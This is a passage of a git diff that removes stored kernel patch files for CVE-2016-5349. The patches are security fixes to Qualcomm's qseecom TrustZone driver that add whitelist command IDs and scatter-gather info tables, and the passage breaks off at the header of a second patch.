-+			TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID_PARAM_ID;
-+			if (qseecom.qsee_version < QSEE_VERSION_40) {
-+				req = (struct qseecom_qteec_ireq *)req_buf;
-+				desc.args[0] = req->app_id;
-+				desc.args[1] = req->req_ptr;
-+				desc.args[2] = req->req_len;
-+				desc.args[3] = req->resp_ptr;
-+				desc.args[4] = req->resp_len;
-+				desc.args[5] = req->sglistinfo_ptr;
-+				desc.args[6] = req->sglistinfo_len;
-+			} else {
-+				req_64bit = (struct qseecom_qteec_64bit_ireq *)
-+						req_buf;
-+				desc.args[0] = req_64bit->app_id;
-+				desc.args[1] = req_64bit->req_ptr;
-+				desc.args[2] = req_64bit->req_len;
-+				desc.args[3] = req_64bit->resp_ptr;
-+				desc.args[4] = req_64bit->resp_len;
-+				desc.args[5] = req_64bit->sglistinfo_ptr;
-+				desc.args[6] = req_64bit->sglistinfo_len;
-+			}
-+			ret = scm_call2(smc_id, &desc);
-+			break;
-+		}
- 		case QSEOS_TEE_INVOKE_COMMAND: {
- 			struct qseecom_qteec_ireq *req;
- 			struct qseecom_qteec_64bit_ireq *req_64bit;
-@@ -710,6 +799,36 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- 			ret = scm_call2(smc_id, &desc);
- 			break;
- 		}
-+		case QSEOS_TEE_INVOKE_COMMAND_WHITELIST: {
-+			struct qseecom_qteec_ireq *req;
-+			struct qseecom_qteec_64bit_ireq *req_64bit;
-+
-+			smc_id = TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID;
-+			desc.arginfo =
-+			TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID_PARAM_ID;
-+			if (qseecom.qsee_version < QSEE_VERSION_40) {
-+				req = (struct qseecom_qteec_ireq *)req_buf;
-+				desc.args[0] = req->app_id;
-+				desc.args[1] = req->req_ptr;
-+				desc.args[2] = req->req_len;
-+				desc.args[3] = req->resp_ptr;
-+				desc.args[4] = req->resp_len;
-+				desc.args[5] = req->sglistinfo_ptr;
-+				desc.args[6] = req->sglistinfo_len;
-+			} else {
-+				req_64bit = (struct qseecom_qteec_64bit_ireq *)
-+						req_buf;
-+				desc.args[0] = req_64bit->app_id;
-+				desc.args[1] = req_64bit->req_ptr;
-+				desc.args[2] = req_64bit->req_len;
-+				desc.args[3] = req_64bit->resp_ptr;
-+				desc.args[4] = req_64bit->resp_len;
-+				desc.args[5] = req_64bit->sglistinfo_ptr;
-+				desc.args[6] = req_64bit->sglistinfo_len;
-+			}
-+			ret = scm_call2(smc_id, &desc);
-+			break;
-+		}
- 		case QSEOS_TEE_CLOSE_SESSION: {
- 			struct qseecom_qteec_ireq *req;
- 			struct qseecom_qteec_64bit_ireq *req_64bit;
-@@ -2490,8 +2609,8 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- {
- 	int ret = 0;
- 	u32 reqd_len_sb_in = 0;
--	struct qseecom_client_send_data_ireq send_data_req;
--	struct qseecom_client_send_data_64bit_ireq send_data_req_64bit;
-+	struct qseecom_client_send_data_ireq send_data_req = {0};
-+	struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0};
- 	struct qseecom_command_scm_resp resp;
- 	unsigned long flags;
- 	struct qseecom_registered_app_list *ptr_app;
-@@ -2499,6 +2618,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 	int name_len = 0;
- 	void *cmd_buf = NULL;
- 	size_t cmd_len;
-+	struct sglist_info *table = data->sglistinfo_ptr;
- 
- 	reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- 	/* find app_id & img_name from list */
-@@ -2523,7 +2643,6 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 	}
- 
- 	if (qseecom.qsee_version < QSEE_VERSION_40) {
--		send_data_req.qsee_cmd_id = QSEOS_CLIENT_SEND_DATA_COMMAND;
- 		send_data_req.app_id = data->client.app_id;
- 		send_data_req.req_ptr = (uint32_t)(__qseecom_uvirt_to_kphys(
- 					data, (uintptr_t)req->cmd_req_buf));
-@@ -2531,11 +2650,14 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		send_data_req.rsp_ptr = (uint32_t)(__qseecom_uvirt_to_kphys(
- 					data, (uintptr_t)req->resp_buf));
- 		send_data_req.rsp_len = req->resp_len;
-+		send_data_req.sglistinfo_ptr =
-+				(uint32_t)virt_to_phys(table);
-+		send_data_req.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 		cmd_buf = (void *)&send_data_req;
- 		cmd_len = sizeof(struct qseecom_client_send_data_ireq);
- 	} else {
--		send_data_req_64bit.qsee_cmd_id =
--					QSEOS_CLIENT_SEND_DATA_COMMAND;
- 		send_data_req_64bit.app_id = data->client.app_id;
- 		send_data_req_64bit.req_ptr = __qseecom_uvirt_to_kphys(data,
- 					(uintptr_t)req->cmd_req_buf);
-@@ -2557,10 +2679,20 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 				send_data_req_64bit.rsp_len);
- 			return -EFAULT;
- 		}
-+		send_data_req_64bit.sglistinfo_ptr =
-+				(uint64_t)virt_to_phys(table);
-+		send_data_req_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 		cmd_buf = (void *)&send_data_req_64bit;
- 		cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq);
- 	}
- 
-+	if (qseecom.whitelist_support == false)
-+		*(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND;
-+	else
-+		*(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
-+
- 	msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- 					data->client.sb_virt,
- 					reqd_len_sb_in,
-@@ -2814,14 +2946,26 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 					goto err;
- 			}
- 		}
--		if (cleanup)
-+
-+		if (cleanup) {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 					ihandle, NULL, len,
- 					ION_IOC_INV_CACHES);
--		else
-+		} else {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 					ihandle, NULL, len,
- 					ION_IOC_CLEAN_INV_CACHES);
-+			if (data->type == QSEECOM_CLIENT_APP) {
-+				data->sglistinfo_ptr[i].indexAndFlags =
-+					SGLISTINFO_SET_INDEX_FLAG(
-+					(sg_ptr->nents == 1), 0,
-+					req->ifd_data[i].cmd_buf_offset);
-+				data->sglistinfo_ptr[i].sizeOrCount =
-+					(sg_ptr->nents == 1) ?
-+					sg->length : sg_ptr->nents;
-+				data->sglist_cnt = i + 1;
-+			}
-+		}
- 		/* Deallocate the handle */
- 		if (!IS_ERR_OR_NULL(ihandle))
- 			ion_free(qseecom.ion_clnt, ihandle);
-@@ -2904,7 +3048,8 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup,
- 			pr_err("Num of scattered entries");
- 			pr_err(" (%d) is greater than max supported %d\n",
- 				sg_ptr->nents, QSEECOM_MAX_SG_ENTRY);
--			goto err;
-+			sg = sg_ptr->sgl;
-+			goto cleanup;
- 		}
- 		sg = sg_ptr->sgl;
- 		if (sg_ptr->nents == 1) {
-@@ -2956,14 +3101,26 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup,
- 				sg = sg_next(sg);
- 			}
- 		}
--		if (cleanup)
-+cleanup:
-+		if (cleanup) {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 					ihandle, NULL, len,
- 					ION_IOC_INV_CACHES);
--		else
-+		} else {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 					ihandle, NULL, len,
- 					ION_IOC_CLEAN_INV_CACHES);
-+			if (data->type == QSEECOM_CLIENT_APP) {
-+				data->sglistinfo_ptr[i].indexAndFlags =
-+					SGLISTINFO_SET_INDEX_FLAG(
-+					(sg_ptr->nents == 1), 1,
-+					req->ifd_data[i].cmd_buf_offset);
-+				data->sglistinfo_ptr[i].sizeOrCount =
-+					(sg_ptr->nents == 1) ?
-+					sg->length : sg_ptr->nents;
-+				data->sglist_cnt = i + 1;
-+			}
-+		}
- 		/* Deallocate the handle */
- 		if (!IS_ERR_OR_NULL(ihandle))
- 			ion_free(qseecom.ion_clnt, ihandle);
-@@ -5544,14 +5701,23 @@ static int __qseecom_update_qteec_req_buf(struct qseecom_qteec_modfd_req *req,
- 				*update = (uint32_t)sg_dma_address(sg_ptr->sgl);
- 		}
- clean:
--		if (cleanup)
-+		if (cleanup) {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 				ihandle, NULL, sg->length,
- 				ION_IOC_INV_CACHES);
--		else
-+		} else {
- 			msm_ion_do_cache_op(qseecom.ion_clnt,
- 				ihandle, NULL, sg->length,
- 				ION_IOC_CLEAN_INV_CACHES);
-+			data->sglistinfo_ptr[i].indexAndFlags =
-+				SGLISTINFO_SET_INDEX_FLAG(
-+				(sg_ptr->nents == 1), 0,
-+				req->ifd_data[i].cmd_buf_offset);
-+			data->sglistinfo_ptr[i].sizeOrCount =
-+				(sg_ptr->nents == 1) ?
-+				sg->length : sg_ptr->nents;
-+			data->sglist_cnt = i + 1;
-+		}
- 		/* Deallocate the handle */
- 		if (!IS_ERR_OR_NULL(ihandle))
- 			ion_free(qseecom.ion_clnt, ihandle);
-@@ -5576,6 +5742,7 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data,
- 	uint32_t reqd_len_sb_in = 0;
- 	void *cmd_buf = NULL;
- 	size_t cmd_len;
-+	struct sglist_info *table = data->sglistinfo_ptr;
- 
- 	ret  = __qseecom_qteec_validate_msg(data, req);
- 	if (ret)
-@@ -5600,8 +5767,15 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data,
- 		return -ENOENT;
- 	}
- 
-+	if ((cmd_id == QSEOS_TEE_OPEN_SESSION) ||
-+			(cmd_id == QSEOS_TEE_REQUEST_CANCELLATION)) {
-+		ret = __qseecom_update_qteec_req_buf(
-+			(struct qseecom_qteec_modfd_req *)req, data, false);
-+		if (ret)
-+			return ret;
-+	}
-+
- 	if (qseecom.qsee_version < QSEE_VERSION_40) {
--		ireq.qsee_cmd_id = cmd_id;
- 		ireq.app_id = data->client.app_id;
- 		ireq.req_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data,
- 						(uintptr_t)req->req_ptr);
-@@ -5609,10 +5783,13 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data,
- 		ireq.resp_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data,
- 						(uintptr_t)req->resp_ptr);
- 		ireq.resp_len = req->resp_len;
-+		ireq.sglistinfo_ptr = (uint32_t)virt_to_phys(table);
-+		ireq.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 		cmd_buf = (void *)&ireq;
- 		cmd_len = sizeof(struct qseecom_qteec_ireq);
- 	} else {
--		ireq_64bit.qsee_cmd_id = cmd_id;
- 		ireq_64bit.app_id = data->client.app_id;
- 		ireq_64bit.req_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data,
- 						(uintptr_t)req->req_ptr);
-@@ -5632,17 +5809,19 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data,
- 				ireq_64bit.resp_ptr, ireq_64bit.resp_len);
- 			return -EFAULT;
- 		}
-+		ireq_64bit.sglistinfo_ptr = (uint64_t)virt_to_phys(table);
-+		ireq_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 		cmd_buf = (void *)&ireq_64bit;
- 		cmd_len = sizeof(struct qseecom_qteec_64bit_ireq);
- 	}
-+	if (qseecom.whitelist_support == true
-+		&& cmd_id == QSEOS_TEE_OPEN_SESSION)
-+		*(uint32_t *)cmd_buf = QSEOS_TEE_OPEN_SESSION_WHITELIST;
-+	else
-+		*(uint32_t *)cmd_buf = cmd_id;
- 
--	if ((cmd_id == QSEOS_TEE_OPEN_SESSION) ||
--			(cmd_id == QSEOS_TEE_REQUEST_CANCELLATION)) {
--		ret = __qseecom_update_qteec_req_buf(
--			(struct qseecom_qteec_modfd_req *)req, data, false);
--		if (ret)
--			return ret;
--	}
- 	reqd_len_sb_in = req->req_len + req->resp_len;
- 	msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- 					data->client.sb_virt,
-@@ -5740,6 +5919,9 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data,
- 	uint32_t reqd_len_sb_in = 0;
- 	void *cmd_buf = NULL;
- 	size_t cmd_len;
-+	struct sglist_info *table = data->sglistinfo_ptr;
-+	void *req_ptr = NULL;
-+	void *resp_ptr = NULL;
- 
- 	ret = copy_from_user(&req, argp,
- 			sizeof(struct qseecom_qteec_modfd_req));
-@@ -5751,6 +5933,8 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data,
- 					(struct qseecom_qteec_req *)(&req));
- 	if (ret)
- 		return ret;
-+	req_ptr = req.req_ptr;
-+	resp_ptr = req.resp_ptr;
- 
- 	/* find app_id & img_name from list */
- 	spin_lock_irqsave(&qseecom.registered_app_list_lock, flags);
-@@ -5771,45 +5955,56 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data,
- 		return -ENOENT;
- 	}
- 
-+	/* validate offsets */
-+	for (i = 0; i < MAX_ION_FD; i++) {
-+		if (req.ifd_data[i].fd) {
-+			if (req.ifd_data[i].cmd_buf_offset >= req.req_len)
-+				return -EINVAL;
-+		}
-+	}
-+	req.req_ptr = (void *)__qseecom_uvirt_to_kvirt(data,
-+						(uintptr_t)req.req_ptr);
-+	req.resp_ptr = (void *)__qseecom_uvirt_to_kvirt(data,
-+						(uintptr_t)req.resp_ptr);
-+	ret = __qseecom_update_qteec_req_buf(&req, data, false);
-+	if (ret)
-+		return ret;
-+
- 	if (qseecom.qsee_version < QSEE_VERSION_40) {
--		ireq.qsee_cmd_id = QSEOS_TEE_INVOKE_COMMAND;
- 		ireq.app_id = data->client.app_id;
- 		ireq.req_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data,
--						(uintptr_t)req.req_ptr);
-+						(uintptr_t)req_ptr);
- 		ireq.req_len = req.req_len;
- 		ireq.resp_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data,
--						(uintptr_t)req.resp_ptr);
-+						(uintptr_t)resp_ptr);
- 		ireq.resp_len = req.resp_len;
- 		cmd_buf = (void *)&ireq;
- 		cmd_len = sizeof(struct qseecom_qteec_ireq);
-+		ireq.sglistinfo_ptr = (uint32_t)virt_to_phys(table);
-+		ireq.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 	} else {
--		ireq_64bit.qsee_cmd_id = QSEOS_TEE_INVOKE_COMMAND;
- 		ireq_64bit.app_id = data->client.app_id;
- 		ireq_64bit.req_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data,
--						(uintptr_t)req.req_ptr);
-+						(uintptr_t)req_ptr);
- 		ireq_64bit.req_len = req.req_len;
- 		ireq_64bit.resp_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data,
--						(uintptr_t)req.resp_ptr);
-+						(uintptr_t)resp_ptr);
- 		ireq_64bit.resp_len = req.resp_len;
- 		cmd_buf = (void *)&ireq_64bit;
- 		cmd_len = sizeof(struct qseecom_qteec_64bit_ireq);
-+		ireq_64bit.sglistinfo_ptr = (uint64_t)virt_to_phys(table);
-+		ireq_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+		dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
- 	}
- 	reqd_len_sb_in = req.req_len + req.resp_len;
-+	if (qseecom.whitelist_support == true)
-+		*(uint32_t *)cmd_buf = QSEOS_TEE_INVOKE_COMMAND_WHITELIST;
-+	else
-+		*(uint32_t *)cmd_buf = QSEOS_TEE_INVOKE_COMMAND;
- 
--	/* validate offsets */
--	for (i = 0; i < MAX_ION_FD; i++) {
--		if (req.ifd_data[i].fd) {
--			if (req.ifd_data[i].cmd_buf_offset >= req.req_len)
--				return -EINVAL;
--		}
--	}
--	req.req_ptr = (void *)__qseecom_uvirt_to_kvirt(data,
--						(uintptr_t)req.req_ptr);
--	req.resp_ptr = (void *)__qseecom_uvirt_to_kvirt(data,
--						(uintptr_t)req.resp_ptr);
--	ret = __qseecom_update_qteec_req_buf(&req, data, false);
--	if (ret)
--		return ret;
- 	msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- 					data->client.sb_virt,
- 					reqd_len_sb_in,
-@@ -5872,6 +6067,15 @@ static int qseecom_qteec_request_cancellation(struct qseecom_dev_handle *data,
- 	return ret;
- }
- 
-+static void __qseecom_clean_data_sglistinfo(struct qseecom_dev_handle *data)
-+{
-+	if (data->sglist_cnt) {
-+		memset(data->sglistinfo_ptr, 0,
-+			SGLISTINFO_TABLE_SIZE);
-+		data->sglist_cnt = 0;
-+	}
-+}
-+
- long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- {
- 	int ret = 0;
-@@ -6047,6 +6251,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		mutex_unlock(&app_access_lock);
- 		if (ret)
- 			pr_err("failed qseecom_send_cmd: %d\n", ret);
-+		__qseecom_clean_data_sglistinfo(data);
- 		break;
- 	}
- 	case QSEECOM_IOCTL_RECEIVE_REQ: {
-@@ -6439,6 +6644,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		mutex_unlock(&app_access_lock);
- 		if (ret)
- 			pr_err("failed open_session_cmd: %d\n", ret);
-+		__qseecom_clean_data_sglistinfo(data);
- 		break;
- 	}
- 	case QSEECOM_QTEEC_IOCTL_CLOSE_SESSION_REQ: {
-@@ -6487,6 +6693,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		mutex_unlock(&app_access_lock);
- 		if (ret)
- 			pr_err("failed Invoke cmd: %d\n", ret);
-+		__qseecom_clean_data_sglistinfo(data);
- 		break;
- 	}
- 	case QSEECOM_QTEEC_IOCTL_REQUEST_CANCELLATION_REQ: {
-@@ -6539,6 +6746,9 @@ static int qseecom_open(struct inode *inode, struct file *file)
- 	init_waitqueue_head(&data->abort_wq);
- 	atomic_set(&data->ioctl_count, 0);
- 
-+	data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL);
-+	if (!(data->sglistinfo_ptr))
-+		return -ENOMEM;
- 	return ret;
- }
- 
-@@ -6591,6 +6801,7 @@ static int qseecom_release(struct inode *inode, struct file *file)
- 		if (data->perf_enabled == true)
- 			qsee_disable_clock_vote(data, CLK_DFAB);
- 	}
-+	kfree(data->sglistinfo_ptr);
- 	kfree(data);
- 
- 	return ret;
-@@ -6731,6 +6942,74 @@ static void __qseecom_deinit_clk(enum qseecom_ce_hw_instance ce)
- 	qclk->instance = CLK_INVALID;
- }
- 
-+/*
-+ * Check if whitelist feature is supported by making a test scm_call
-+ * to send a whitelist command to an invalid app ID 0
-+ */
-+static int qseecom_check_whitelist_feature(void)
-+{
-+	struct qseecom_client_send_data_ireq send_data_req = {0};
-+	struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0};
-+	struct qseecom_command_scm_resp resp;
-+	uint32_t buf_size = 128;
-+	void *buf = NULL;
-+	void *cmd_buf = NULL;
-+	size_t cmd_len;
-+	int ret = 0;
-+	phys_addr_t pa;
-+
-+	buf = kzalloc(buf_size, GFP_KERNEL);
-+	if (!buf)
-+		return -ENOMEM;
-+	pa = virt_to_phys(buf);
-+	if (qseecom.qsee_version < QSEE_VERSION_40) {
-+		send_data_req.qsee_cmd_id =
-+			QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
-+		send_data_req.app_id = 0;
-+		send_data_req.req_ptr = (uint32_t)pa;
-+		send_data_req.req_len = buf_size;
-+		send_data_req.rsp_ptr = (uint32_t)pa;
-+		send_data_req.rsp_len = buf_size;
-+		send_data_req.sglistinfo_ptr = (uint32_t)pa;
-+		send_data_req.sglistinfo_len = buf_size;
-+		cmd_buf = (void *)&send_data_req;
-+		cmd_len = sizeof(struct qseecom_client_send_data_ireq);
-+	} else {
-+		send_data_req_64bit.qsee_cmd_id =
-+			QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
-+		send_data_req_64bit.app_id = 0;
-+		send_data_req_64bit.req_ptr = (uint64_t)pa;
-+		send_data_req_64bit.req_len = buf_size;
-+		send_data_req_64bit.rsp_ptr = (uint64_t)pa;
-+		send_data_req_64bit.rsp_len = buf_size;
-+		send_data_req_64bit.sglistinfo_ptr = (uint64_t)pa;
-+		send_data_req_64bit.sglistinfo_len = buf_size;
-+		cmd_buf = (void *)&send_data_req_64bit;
-+		cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq);
-+	}
-+	ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1,
-+				cmd_buf, cmd_len,
-+				&resp, sizeof(resp));
-+/*
-+ * If this cmd exists and whitelist is supported, scm_call return -2 (scm
-+ * driver remap it to -EINVAL) and resp.result 0xFFFFFFED(-19); Otherwise,
-+ * scm_call return -1 (remap to -EIO).
-+ */
-+	if (ret == -EIO) {
-+		qseecom.whitelist_support = false;
-+		ret = 0;
-+	} else if (ret == -EINVAL &&
-+		resp.result == QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD) {
-+		qseecom.whitelist_support = true;
-+		ret = 0;
-+	} else {
-+		pr_err("Failed to check whitelist: ret = %d, result = 0x%x\n",
-+			ret, resp.result);
-+	}
-+	kfree(buf);
-+	return ret;
-+}
-+
- static int qseecom_probe(struct platform_device *pdev)
- {
- 	int rc;
-@@ -6762,6 +7041,7 @@ static int qseecom_probe(struct platform_device *pdev)
- 
- 	qseecom.app_block_ref_cnt = 0;
- 	init_waitqueue_head(&qseecom.app_block_wq);
-+	qseecom.whitelist_support = true;
- 
- 	rc = alloc_chrdev_region(&qseecom_device_no, 0, 1, QSEECOM_DEV);
- 	if (rc < 0) {
-@@ -7056,6 +7336,14 @@ static int qseecom_probe(struct platform_device *pdev)
- 	qseecom.qsee_perf_client = msm_bus_scale_register_client(
- 					qseecom_platform_support);
- 
-+	rc = qseecom_check_whitelist_feature();
-+	if (rc) {
-+		rc = -EINVAL;
-+		goto exit_destroy_ion_client;
-+	}
-+	pr_warn("qseecom.whitelist_support = %d\n",
-+				qseecom.whitelist_support);
-+
- 	if (!qseecom.qsee_perf_client)
- 		pr_err("Unable to register bus client\n");
- 	return 0;
-diff --git a/include/soc/qcom/qseecomi.h b/include/soc/qcom/qseecomi.h
-index ad135e8..50b10f9 100644
---- a/include/soc/qcom/qseecomi.h
-+++ b/include/soc/qcom/qseecomi.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -18,6 +18,7 @@
- 
- #define QSEECOM_KEY_ID_SIZE   32
- 
-+#define QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD  -19   /*0xFFFFFFED*/
- #define QSEOS_RESULT_FAIL_UNSUPPORTED_CE_PIPE -63
- #define QSEOS_RESULT_FAIL_KS_OP               -64
- #define QSEOS_RESULT_FAIL_KEY_ID_EXISTS       -65
-@@ -74,6 +75,9 @@ enum qseecom_qceos_cmd_id {
- 	QSEOS_FSM_IKE_CMD_SIGN = 0x200,
- 	QSEOS_FSM_IKE_CMD_PROV_KEY = 0x201,
- 	QSEOS_FSM_IKE_CMD_ENCRYPT_PRIVATE_KEY = 0x202,
-+	QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST = 0x1C,
-+	QSEOS_TEE_OPEN_SESSION_WHITELIST = 0x1D,
-+	QSEOS_TEE_INVOKE_COMMAND_WHITELIST = 0x1E,
- 	QSEOS_FSM_OEM_FUSE_WRITE_ROW = 0x301,
- 	QSEOS_FSM_OEM_FUSE_READ_ROW = 0x302,
- 	QSEOS_CMD_MAX     = 0xEFFFFFFF
-@@ -175,6 +179,8 @@ __packed struct qseecom_client_send_data_ireq {
- 	uint32_t req_len;
- 	uint32_t rsp_ptr;/* First 4 bytes should be the return status */
- 	uint32_t rsp_len;
-+	uint32_t sglistinfo_ptr;
-+	uint32_t sglistinfo_len;
- };
- 
- __packed struct qseecom_client_send_data_64bit_ireq {
-@@ -184,6 +190,8 @@ __packed struct qseecom_client_send_data_64bit_ireq {
- 	uint32_t req_len;
- 	uint64_t rsp_ptr;
- 	uint32_t rsp_len;
-+	uint64_t sglistinfo_ptr;
-+	uint32_t sglistinfo_len;
- };
- 
- __packed struct qseecom_reg_log_buf_ireq {
-@@ -286,6 +294,8 @@ __packed struct qseecom_qteec_ireq {
- 	uint32_t    req_len;
- 	uint32_t    resp_ptr;
- 	uint32_t    resp_len;
-+	uint32_t    sglistinfo_ptr;
-+	uint32_t    sglistinfo_len;
- };
- 
- __packed struct qseecom_qteec_64bit_ireq {
-@@ -295,6 +305,8 @@ __packed struct qseecom_qteec_64bit_ireq {
- 	uint32_t    req_len;
- 	uint64_t    resp_ptr;
- 	uint32_t    resp_len;
-+	uint64_t    sglistinfo_ptr;
-+	uint32_t    sglistinfo_len;
- };
- 
- __packed struct qseecom_client_send_fsm_key_req {
-@@ -634,4 +646,37 @@ __packed struct qseecom_client_send_fsm_key_req {
- #define TZ_OS_CONTINUE_BLOCKED_REQUEST_ID_PARAM_ID \
- 	TZ_SYSCALL_CREATE_PARAM_ID_1(TZ_SYSCALL_PARAM_TYPE_VAL)
- 
-+#define TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID \
-+	TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS, \
-+	TZ_SVC_APP_ID_PLACEHOLDER, 0x06)
-+
-+#define TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID_PARAM_ID \
-+	TZ_SYSCALL_CREATE_PARAM_ID_7( \
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
-+	TZ_SYSCALL_PARAM_TYPE_VAL)
-+
-+#define TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID			\
-+	TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS,			\
-+	TZ_SVC_APP_ID_PLACEHOLDER, 0x07)
-+
-+#define TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID_PARAM_ID		\
-+	TZ_SYSCALL_CREATE_PARAM_ID_7(					\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL)
-+
-+#define TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID			\
-+	TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS,			\
-+	TZ_SVC_APP_ID_PLACEHOLDER, 0x09)
-+
-+#define TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID_PARAM_ID		\
-+	TZ_SYSCALL_CREATE_PARAM_ID_7(					\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
-+	TZ_SYSCALL_PARAM_TYPE_VAL)
-+
- #endif /* __QSEECOMI_H_ */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch
deleted file mode 100644
index 052f085f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From 03853a58952834ac3e1e3007c9c680dd4c001a2f Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Thu, 1 Sep 2016 10:20:50 -0700
-Subject: qseecom: allocate sglistinfo buffer for kernel clients
-
-To support whitelist feature, sglistinfo table should also
-be allocated from qseecom kernel APIs used by kernel client.
-Besides, initialize sg in __qseecom_update_cmd_buf_64 to
-address a static analysis warning.
-
-Change-Id: I1f1967fd9e95444cca728f09e3e8f4914b2abb95
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 11 +++++++++++
- 1 file changed, 11 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
